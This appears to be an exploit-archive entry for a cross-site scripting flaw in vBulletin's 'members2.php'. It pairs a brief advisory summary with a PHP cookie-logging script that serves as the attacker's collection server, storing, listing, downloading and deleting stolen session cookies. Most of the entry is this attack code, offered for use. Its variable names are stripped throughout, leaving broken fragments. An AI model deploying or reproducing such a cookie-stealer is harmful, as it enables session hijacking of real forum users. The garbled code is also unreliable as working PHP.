source: https://www.securityfocus.com/bid/6246/info Due to insufficient sanitization of user supplied values, it is possible to exploit a vulnerability in VBulletin. By passing an invalid value to a variable located in 'members2.php', it is possible to generate an error page which will include attacker-supplied HTML code which will be executed in a legitimate users browser. This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software. The attacker may use cookie-based authentication credentials to hijack the session of the legitimate user. - Run this script on some host: "; } Else { = ""; = ""; } Print (); */ Print ("
"); Print (""); Exit (); } Else { Print (""); = Array_UniQue (File ()); Print (""); Print ("vBulletin XSS Injection Vulnerability: Exploit\n"); Print ("Coded By: Sp.IC
"); /* Print (); */ Switch (['Action']) { Case "Log": = ['Cookie']; = StrStr (, SubStr (, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL)))))); = FOpen (, "a+"); FWrite (, Trim () . "\n"); FClose (); Print (""); Break; Case "List": If (!File_Exists () || !In_Array ()) { Print ("
There are No Records
"); Print (".:: Statics\n"); Print ("\n"); Print ("^ Logged Records : " . Count (File ()) . "\n"); Print ("^ Listed Records : " . Count () . " [Not Counting Duplicates]\n"); Print ("\n"); Print (".:: Options\n"); Print ("\n"); If (Count (File ()) > 0) { ['Download'] = "[Download]"; } Else{ ['Download'] = "[No Records in Log]"; } Print ("^ Download Log : " . ['Download'] . "\n"); Print ("^ Clear Records : [Y]\n"); Print ("\n"); Print (".:: Records\n"); Print ("\n"); While (List ([0], [1]) = Each ()) { Print ("" . [0] . ": " . [1]); } } Print (""); Break; Case "Delete": @UnLink (); Print ("